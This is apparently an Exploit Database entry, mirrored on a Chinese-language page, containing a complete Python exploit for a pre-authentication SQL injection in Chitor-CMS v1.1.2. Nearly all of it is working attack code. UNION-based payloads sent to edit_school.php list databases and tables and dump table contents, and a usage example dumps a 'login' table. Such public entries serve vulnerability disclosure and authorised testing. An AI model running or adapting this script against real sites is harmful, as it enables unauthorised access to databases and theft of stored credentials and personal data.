Chitor-CMS v1.1.2 – Pre-Auth SQL Injection

• Exploit Database
• 112 阅读

• 作者： msd0pe
  日期： 2023-04-20
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/51383/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165

  #!/usr/bin/python3   ####################################################### # # #Exploit Title: Chitor-CMS v1.1.2 - Pre-Auth SQL Injection# #Date: 2023/04/13 # #ExploitAuthor: msd0pe# #Project: https://github.com/waqaskanju/Chitor-CMS# #My Github: https://github.com/msd0pe-1 # #Patched the 2023/04/16: 69d3442 commit # # # #######################################################   __description__ = &apos;Chitor-CMS < 1.1.2 Pre-Auth SQL Injection.&apos; __author__ = &apos;msd0pe&apos; __version__ = &apos;1.1&apos; __date__ = &apos;2023/04/13&apos;   class bcolors: PURPLE = &apos;\033[95m&apos; BLUE = &apos;\033[94m&apos; GREEN = &apos;\033[92m&apos; OCRA = &apos;\033[93m&apos; RED = &apos;\033[91m&apos; CYAN = &apos;\033[96m&apos; ENDC = &apos;\033[0m&apos; BOLD = &apos;\033[1m&apos; UNDERLINE = &apos;\033[4m&apos;   class infos: INFO = "[" + bcolors.OCRA + bcolors.BOLD + "?" + bcolors.ENDC + bcolors.ENDC + "] " ERROR = "[" + bcolors.RED + bcolors.BOLD + "X" + bcolors.ENDC + bcolors.ENDC + "] " GOOD = "[" + bcolors.GREEN + bcolors.BOLD + "+" + bcolors.ENDC + bcolors.ENDC + "] " PROCESS = "[" + bcolors.BLUE + bcolors.BOLD + "*" + bcolors.ENDC + bcolors.ENDC + "] "   import re import requests import optparse from prettytable import PrettyTable   def DumpTable(url, database, table): header = {"User-Agent": "5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"} x = PrettyTable() columns = [] payload = "/edit_school.php?id=-2164&apos; UNION ALL SELECT NULL%2CNULL%2CCONCAT(0x71707a6b71%2CJSON_ARRAYAGG(CONCAT_WS(0x787a6d64706c%2Ccolumn_name))%2C0x716a6b6271) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=\"" + table + "\" AND table_schema=\"" + database + "\"-- -" u = requests.get(url + payload, headers=header) try: r = re.findall("qpzkq\[(.*?)\]qjkbq",u.text) r = r[0].replace(&apos;\"&apos;,"").split(&apos;,&apos;) if r == []: pass else: for i in r: columns.append(i) pass except: pass x.field_names = columns payload = "/edit_school.php?id=-2164&apos; UNION ALL SELECT NULL%2CNULL%2CCONCAT(0x71707a6b71%2CJSON_ARRAYAGG(CONCAT_WS(0x787a6d64706c%2C " + str(columns).replace("[","").replace("]","").replace("\&apos;","").replace(" ","") + "))%2C0x716a6b6271) FROM " + database + "." + table + "-- -" u = requests.get(url + payload, headers=header) try: r = re.findall("qpzkq\[(.*?)\]qjkbq",u.text) r = r[0].replace(&apos;\"&apos;,"").split(&apos;,&apos;) if r == []: pass else: for i in r: i = i.split("xzmdpl") x.add_rows([i]) except ValueError: r = re.findall("qpzkq\[(.*?)\]qjkbq",u.text) r = r[0].replace(&apos;\"&apos;,"").split(&apos;,&apos;) if r == []: pass else: for i in r: i = i.split("xzmdpl") i.append("") x.add_rows([i]) print(x)   def ListTables(url, database): header = {"User-Agent": "5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"} x = PrettyTable() x.field_names = ["TABLES"] payload = "/edit_school.php?id=-2164&apos; UNION ALL SELECT NULL%2CNULL%2CCONCAT(0x71707a6b71%2CJSON_ARRAYAGG(CONCAT_WS(0x787a6d64706c%2Ctable_name))%2C0x716a6b6271) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema IN (0x" + str(database).encode(&apos;utf-8&apos;).hex() + ")-- -" u = requests.get(url + payload, headers=header) try: r = re.findall("qpzkq\[(.*?)\]qjkbq",u.text) r = r[0].replace(&apos;\"&apos;,"").split(&apos;,&apos;) if r == []: pass else: for i in r: x.add_row([i]) except: pass print(x)   def ListDatabases(url): header = {"User-Agent": "5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"} x = PrettyTable() x.field_names = ["DATABASES"] payload = "/edit_school.php?id=-2164&apos; UNION ALL SELECT NULL%2CNULL%2CCONCAT(0x71707a6b71%2CJSON_ARRAYAGG(CONCAT_WS(0x787a6d64706c%2Cschema_name))%2C0x716a6b6271) FROM INFORMATION_SCHEMA.SCHEMATA-- -" u = requests.get(url + payload, headers=header) try: r = re.findall("qpzkq\[(.*?)\]qjkbq",u.text) r = r[0].replace(&apos;\"&apos;,"").split(&apos;,&apos;) if r == []: pass else: for i in r: x.add_row([i]) except: pass print(x)   def Main(): Menu = optparse.OptionParser(usage=&apos;python %prog [options]&apos;, version=&apos;%prog &apos; + __version__) Menu.add_option(&apos;-u&apos;, &apos;--url&apos;, type="str", dest="url", help=&apos;target url&apos;) Menu.add_option(&apos;--dbs&apos;, action="store_true", dest="l_databases", help=&apos;list databases&apos;) Menu.add_option(&apos;-D&apos;, &apos;--db&apos;, type="str", dest="database", help=&apos;select a database&apos;) Menu.add_option(&apos;--tables&apos;, action="store_true", dest="l_tables", help=&apos;list tables&apos;) Menu.add_option(&apos;-T&apos;, &apos;--table&apos;, type="str", dest="table", help=&apos;select a table&apos;) Menu.add_option(&apos;--dump&apos;, action="store_true", dest="dump", help=&apos;dump the content&apos;) (options, args) = Menu.parse_args()   Examples = optparse.OptionGroup(Menu, "Examples", """python3 chitor1.1.py -u http://127.0.0.1 --dbs python3 chitor1.1.py -u http://127.0.0.1 -D chitor_db --tables python3 chitor1.1.py -u http://127.0.0.1 -D chitor_db -T login --dump """) Menu.add_option_group(Examples)   if len(args) != 0 or options == {&apos;url&apos;: None, &apos;l_databases&apos;: None, &apos;database&apos;: None, &apos;l_tables&apos;: None, &apos;table&apos;: None, &apos;dump&apos;: None}: Menu.print_help() print(&apos;&apos;) print(&apos;%s&apos; % __description__) print(&apos;Source code put in public domain by &apos; + bcolors.PURPLE + bcolors.BOLD + &apos;msd0pe&apos; + bcolors.ENDC + bcolors.ENDC + &apos;,&apos; + bcolors.RED + bcolors.BOLD + &apos;no Copyright&apos; + bcolors.ENDC + bcolors.ENDC) print(&apos;Any malicious or illegal activity may be punishable by law&apos;) print(&apos;Use at your own risk&apos;)   elif len(args) == 0: try: if options.url != None: if options.l_databases != None: ListDatabases(options.url) if options.database != None: if options.l_tables != None: ListTables(options.url, options.database) if options.table != None: if options.dump != None: DumpTable(options.url, options.database, options.table) except: print("Unexpected error")   if __name__ == &apos;__main__&apos;: try: Main()   except KeyboardInterrupt: print() print(infos.PROCESS + "Exiting...") print() exit(1)